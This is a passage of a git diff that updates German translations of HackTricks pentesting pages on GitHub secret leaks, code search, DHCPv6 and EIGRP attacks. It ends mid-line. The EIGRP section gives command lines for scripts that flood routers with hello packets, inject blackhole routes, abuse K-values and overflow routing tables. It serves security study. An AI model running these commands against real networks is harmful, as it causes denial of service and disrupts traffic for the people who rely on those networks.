+{% endhint %} ``` diff --git a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index 865f21f11..ee33c04b6 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -1,25 +1,26 @@ # Github Dorks & Leaks +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} \ -**Bug-Bounty-Tipp**: **Registrieren** Sie sich für **Intigriti**, eine Premium-**Bug-Bounty-Plattform, die von Hackern für Hacker erstellt wurde**! Treten Sie uns noch heute unter [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) bei und verdienen Sie Prämien von bis zu **100.000 $**! +**Bug-Bounty-Tipp**: **Melden Sie sich an** bei **Intigriti**, einer Premium-**Bug-Bounty-Plattform, die von Hackern für Hacker erstellt wurde**! Treten Sie noch heute bei [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) bei und beginnen Sie, Prämien von bis zu **$100.000** zu verdienen! {% embed url="https://go.intigriti.com/hacktricks" %} -Nun, da wir die Liste der Assets unseres Scopes erstellt haben, ist es an der Zeit, nach einigen OSINT-Niedrigfrüchten zu suchen. +Nun, da wir die Liste der Assets unseres Umfangs erstellt haben, ist es an der Zeit, nach einigen OSINT-Niedrigfrüchten zu suchen. ### Plattformen, die bereits nach Leaks gesucht haben @@ -321,16 +322,17 @@ GCP SECRET AWS SECRET "private" extension:pgp ``` +{% hint style="success" %} +Lernen Sie AWS-Hacking und üben Sie:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking und üben Sie: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} diff --git a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index c8278a219..869a71356 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -1,18 +1,19 @@ # Weite Quellcodesuche +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositorys einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} **Try Hard Security Group** @@ -24,16 +25,16 @@ Andere Möglichkeiten, HackTricks zu unterstützen: Das Ziel dieser Seite ist es, **Plattformen aufzulisten, die die Suche nach Code** (literal oder regex) in Tausenden/Millionen von Repos auf einer oder mehreren Plattformen ermöglichen. -Dies hilft in verschiedenen Situationen, um nach **geleakten Informationen** oder nach **Vulnerabilitätsmustern** zu suchen. +Dies hilft in mehreren Fällen, nach **geleakten Informationen** oder nach **Vulnerabilitätsmustern** zu suchen. -* [**SourceGraph**](https://sourcegraph.com/search): Suche in Millionen von Repositories. Es gibt eine kostenlose Version und eine Enterprise-Version (mit 15 Tagen kostenlos). Es unterstützt Regexes. +* [**SourceGraph**](https://sourcegraph.com/search): Suche in Millionen von Repos. Es gibt eine kostenlose Version und eine Enterprise-Version (mit 15 Tagen kostenlos). Es unterstützt Regexes. * [**Github-Suche**](https://github.com/search): Suche über Github. Es unterstützt Regexes. -* Möglicherweise ist es auch nützlich, auch [**Github Code Search**](https://cs.github.com/) zu überprüfen. +* Vielleicht ist es auch nützlich, [**Github Code Search**](https://cs.github.com/) zu überprüfen. * [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Suche in Gitlab-Projekten. Unterstützt Regexes. * [**SearchCode**](https://searchcode.com/): Suche nach Code in Millionen von Projekten. {% hint style="warning" %} -Wenn Sie in einem Repo nach Lecks suchen und etwas wie `git log -p` ausführen, vergessen Sie nicht, dass es **andere Branches mit anderen Commits** geben könnte, die Geheimnisse enthalten! +Wenn Sie in einem Repo nach Leaks suchen und etwas wie `git log -p` ausführen, vergessen Sie nicht, dass es **andere Branches mit anderen Commits** geben könnte, die Geheimnisse enthalten! {% endhint %} **Try Hard Security Group** @@ -42,16 +43,17 @@ Wenn Sie in einem Repo nach Lecks suchen und etwas wie `git log -p` ausführen, {% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositorys einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index fbdede5d9..8391f347e 100644 --- a/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} -### Vergleich der DHCPv6- und DHCPv4-Nachrichtentypen -Eine vergleichende Darstellung der DHCPv6- und DHCPv4-Nachrichtentypen wird in der folgenden Tabelle dargestellt: +### DHCPv6 vs. DHCPv4 Nachrichtentypen Vergleich +Ein Vergleich der Nachrichtentypen von DHCPv6 und DHCPv4 wird in der folgenden Tabelle dargestellt: -| DHCPv6-Nachrichtentyp | DHCPv4-Nachrichtentyp | +| DHCPv6 Nachrichtentyp | DHCPv4 Nachrichtentyp | |:-------------------|:-------------------| | Solicit (1) | DHCPDISCOVER | | Advertise (2) | DHCPOFFER | @@ -28,36 +29,37 @@ Eine vergleichende Darstellung der DHCPv6- und DHCPv4-Nachrichtentypen wird in d | Reconfigure (10) | DHCPFORCERENEW | | Relay-Forw (12), Relay-Reply (13) | none | -**Ausführliche Erklärung der DHCPv6-Nachrichtentypen:** +**Detaillierte Erklärung der DHCPv6 Nachrichtentypen:** 1. **Solicit (1)**: Initiiert von einem DHCPv6-Client, um verfügbare Server zu finden. -2. **Advertise (2)**: Von Servern als Antwort auf eine Solicit-Nachricht gesendet, um die Verfügbarkeit des DHCP-Dienstes anzuzeigen. +2. **Advertise (2)**: Von Servern als Antwort auf Solicit gesendet, um die Verfügbarkeit des DHCP-Dienstes anzuzeigen. 3. **Request (3)**: Clients verwenden dies, um IP-Adressen oder Präfixe von einem bestimmten Server anzufordern. 4. **Confirm (4)**: Wird von einem Client verwendet, um zu überprüfen, ob die zugewiesenen Adressen im Netzwerk noch gültig sind, normalerweise nach einer Netzwerkänderung. -5. **Renew (5)**: Clients senden dies an den ursprünglichen Server, um die Gültigkeitsdauer von Adressen zu verlängern oder Konfigurationen zu aktualisieren. -6. **Rebind (6)**: An jeden Server gesendet, um die Gültigkeitsdauer von Adressen zu verlängern oder Konfigurationen zu aktualisieren, insbesondere wenn auf eine Renew-Nachricht keine Antwort empfangen wird. +5. **Renew (5)**: Clients senden dies an den ursprünglichen Server, um Adresslaufzeiten zu verlängern oder Konfigurationen zu aktualisieren. +6. **Rebind (6)**: An jeden Server gesendet, um Adresslaufzeiten zu verlängern oder Konfigurationen zu aktualisieren, insbesondere wenn auf ein Renew keine Antwort erhalten wird. 7. **Reply (7)**: Server verwenden dies, um Adressen, Konfigurationsparameter bereitzustellen oder Nachrichten wie Release oder Decline zu bestätigen. -8. **Release (8)**: Clients informieren den Server, dass eine oder mehrere zugewiesene Adressen nicht mehr verwendet werden sollen. +8. **Release (8)**: Clients informieren den Server, die Verwendung einer oder mehrerer zugewiesener Adressen zu beenden. 9. **Decline (9)**: Von Clients gesendet, um zu melden, dass zugewiesene Adressen im Netzwerk in Konflikt stehen. 10. **Reconfigure (10)**: Server fordern Clients auf, Transaktionen für neue oder aktualisierte Konfigurationen zu initiieren. -11. **Information-Request (11)**: Clients fordern Konfigurationsparameter ohne Zuweisung einer IP-Adresse an. +11. **Information-Request (11)**: Clients fordern Konfigurationsparameter ohne IP-Adresszuweisung an. 12. **Relay-Forw (12)**: Relay-Agenten leiten Nachrichten an Server weiter. -13. **Relay-Repl (13)**: Server antworten Relay-Agenten, die die Nachricht an den Client weiterleiten. +13. **Relay-Repl (13)**: Server antworten auf Relay-Agenten, die dann die Nachricht an den Client weiterleiten. ## Referenzen * [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages) +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index 260b90744..ee8e6660c 100644 --- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -1,38 +1,39 @@ -# EIGRP-Angriffe +# EIGRP Angriffe + +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} -**Dies ist eine Zusammenfassung der in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **aufgeführten Angriffe. Überprüfen Sie sie für weitere Informationen.** +**Dies ist eine Zusammenfassung der Angriffe, die in** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **exponiert wurden. Überprüfen Sie sie für weitere Informationen.** -## **Angriff mit gefälschten EIGRP-Nachbarn** +## **Fake EIGRP Nachbarn Angriff** -- **Ziel**: Überlastung der Router-CPU durch Fluten mit EIGRP-Hello-Paketen, was potenziell zu einem Denial-of-Service (DoS)-Angriff führen kann. -- **Tool**: Skript **helloflooding.py**. +- **Ziel**: Überlastung der Router-CPUs durch Fluten mit EIGRP-Hello-Paketen, was potenziell zu einem Denial-of-Service (DoS)-Angriff führen kann. +- **Tool**: **helloflooding.py** Skript. - **Ausführung**: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%% - **Parameter**: -- `--interface`: Gibt die Netzwerkschnittstelle an, z.B. `eth0`. -- `--as`: Definiert die EIGRP-autonome Systemnummer, z.B. `1`. -- `--subnet`: Legt den Subnetzstandort fest, z.B. `10.10.100.0/24`. +- `--interface`: Gibt die Netzwerkschnittstelle an, z. B. `eth0`. +- `--as`: Definiert die EIGRP-autonome Systemnummer, z. B. `1`. +- `--subnet`: Legt den Subnetzstandort fest, z. B. `10.10.100.0/24`. -## **EIGRP Blackhole-Angriff** +## **EIGRP Blackhole Angriff** -- **Ziel**: Unterbrechung des Netzwerkverkehrsflusses durch Einspritzen einer falschen Route, die zu einem Blackhole führt, in dem der Verkehr zu einem nicht vorhandenen Ziel geleitet wird. -- **Tool**: Skript **routeinject.py**. +- **Ziel**: Unterbrechung des Netzwerkverkehrsflusses durch Einspeisen einer falschen Route, was zu einem Blackhole führt, wohin der Verkehr an ein nicht vorhandenes Ziel gerichtet wird. +- **Tool**: **routeinject.py** Skript. - **Ausführung**: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 @@ -44,10 +45,10 @@ Andere Möglichkeiten, HackTricks zu unterstützen: - `--dst`: Legt die Ziel-Subnetz-IP fest. - `--prefix`: Definiert die Maske der Ziel-Subnetz-IP. -## **Missbrauch von K-Werten-Angriff** +## **Missbrauch von K-Werten Angriff** -- **Ziel**: Kontinuierliche Störungen und Wiederverbindungen im EIGRP-Domäne durch Einspritzen veränderter K-Werte erzeugen, was effektiv zu einem DoS-Angriff führt. -- **Tool**: Skript **relationshipnightmare.py**. +- **Ziel**: Kontinuierliche Störungen und Wiederverbindungen im EIGRP-Domäne durch Einspritzen veränderter K-Werte zu erzeugen, was effektiv zu einem DoS-Angriff führt. +- **Tool**: **relationshipnightmare.py** Skript. - **Ausführung**: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 @@ -57,10 +58,10 @@ Andere Möglichkeiten, HackTricks zu unterstützen: - `--as`: Definiert die EIGRP-AS-Nummer. - `--src`: Legt die IP-Adresse eines legitimen Routers fest. -## **Routing-Tabelle-Überlauf-Angriff** +## **Routing-Tabelle Überlauf Angriff** -- **Ziel**: Belastung der Router-CPU und des RAMs durch Fluten der Routing-Tabelle mit zahlreichen falschen Routen. -- **Tool**: Skript **routingtableoverflow.py**. +- **Ziel**: Überlastung der Router-CPU und des RAMs durch Fluten der Routing-Tabelle mit zahlreichen falschen Routen. +- **Tool**: **routingtableoverflow.py** Skript. - **Ausführung**: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 @@ -70,17 +71,17 @@ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 - `--as`: Definiert die EIGRP-AS-Nummer. - `--src`: Legt die IP-Adresse des Angreifers fest. +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index ed12942f9..a8b1314b4 100644 --- a/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -1,37 +1,37 @@ # GLBP & HSRP Angriffe +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 